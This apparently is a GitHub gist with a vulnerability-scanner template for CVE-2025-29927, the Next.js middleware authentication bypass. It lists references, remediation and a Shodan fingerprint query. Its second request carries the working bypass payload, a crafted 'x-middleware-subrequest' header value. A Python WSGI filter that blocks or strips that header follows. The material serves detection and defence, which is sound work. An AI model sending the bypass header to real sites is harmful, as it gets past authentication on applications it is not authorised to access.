@ricardojba
Last active March 25, 2025 19:37
id: CVE-2025-29927

info:
  name: Next.js Middleware Auth Bypass
  author: vibrio
  severity: critical
  description: |
    Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.
    The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
    'x-middleware-subrequest' header, which can lead to authorization bypass and other security controls circumvention.
  reference:
    - https://www.assetnote.io/resources/research/doing-the-due-diligence-analyzing-the-next-js-middleware-bypass-cve-2025-29927 # (best link)
    - https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
    - https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
    - https://github.com/6mile/nextjs-CVE-2025-29927
    - https://nextjs.org/blog/cve-2025-29927
    - https://www.runzero.com/blog/next-js/
    - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
  remediation: |
    Upgrade to Next.js 13.5.9, 14.2.25 or 15.2.3 or later.
    If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cwe-id: CWE-287
  metadata:
    max-request: 1
    shodan-query: x-middleware-rewrite
    fofa-query: x-middleware-rewrite
    product: next.js
    vendor: zeit
  tags: cve,cve2025,nextjs,auth-bypass,authbypass,login,panel

# Request 2 only runs when request 1 fingerprints a middleware-protected app.
flow: http(1) && http(2)

http:
  # Request 1: does the target answer with a middleware rewrite/redirect to a login or dashboard route?
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      x-nextjs-data: 1
    matchers-condition: and
    matchers:
      - type: word
        name: Next.js Middleware Auth Detected
        part: header
        words:
          - 'x-middleware-rewrite: /login'
          - 'x-nextjs-rewrite: /login'
          - 'x-nextjs-matched-path: /login'
          - 'x-nextjs-redirect: /login'
          - 'x-middleware-rewrite: /dashboard'
          - 'x-nextjs-rewrite: /dashboard'
          - 'x-nextjs-matched-path: /dashboard'
          - 'x-nextjs-redirect: /dashboard'
        condition: or
        case-insensitive: true
        internal: true
      - type: status
        status:
          - 200
          - 307
        condition: or
        internal: true

  # Request 2: same path with the subrequest header; a 200 means the middleware was skipped.
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      x-nextjs-data: 1
      x-middleware-subrequest: "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"
    matchers:
      - type: status
        name: Next.js Middleware Auth Bypass
        status:
          - 200
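The remediation above says to block `x-middleware-subrequest` at the server level when upgrading is not possible. The WSGI filter below is an added example (not part of the gist or of Next.js) showing what that looks like in front of an app: it rejects or strips the header before the request reaches the application, logs the attempt, and handles header-name case variants because WSGI normalises them into one environ key. The `demo_app`, `call` helper and the header values used in the demo are constructed for illustration.

```python
import logging
from typing import Callable, Iterable

BLOCKED_HEADER = "x-middleware-subrequest"
# WSGI folds "X-Middleware-Subrequest", "x-middleware-subrequest", etc. into this one key.
ENVIRON_KEY = "HTTP_" + BLOCKED_HEADER.upper().replace("-", "_")

log = logging.getLogger("header-filter")


class BlockMiddlewareSubrequest:
    """Reject (default) or strip an externally supplied x-middleware-subrequest header."""

    def __init__(self, app: Callable, mode: str = "reject") -> None:
        if mode not in ("reject", "strip"):
            raise ValueError("mode must be 'reject' or 'strip'")
        self.app, self.mode = app, mode

    def __call__(self, environ: dict, start_response: Callable) -> Iterable[bytes]:
        value = environ.get(ENVIRON_KEY)
        if value is None:
            return self.app(environ, start_response)
        # Worth alerting on: a legitimate browser never sends this header.
        log.warning("blocked %s from %s: %r", BLOCKED_HEADER,
                    environ.get("REMOTE_ADDR", "?"), value[:80])
        if self.mode == "strip":
            cleaned = {k: v for k, v in environ.items() if k != ENVIRON_KEY}
            return self.app(cleaned, start_response)
        start_response("403 Forbidden", [("Content-Type", "text/plain")])
        return [b"forbidden\n"]


def demo_app(environ: dict, start_response: Callable) -> Iterable[bytes]:
    """Constructed stand-in for the protected app: reports whether the header reached it."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"seen" if ENVIRON_KEY in environ else b"clean"]


def call(app: Callable, headers: dict) -> tuple:
    """Drive a WSGI app with constructed request headers; returns (status, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/dashboard", "REMOTE_ADDR": "203.0.113.5"}
    for name, value in headers.items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body
```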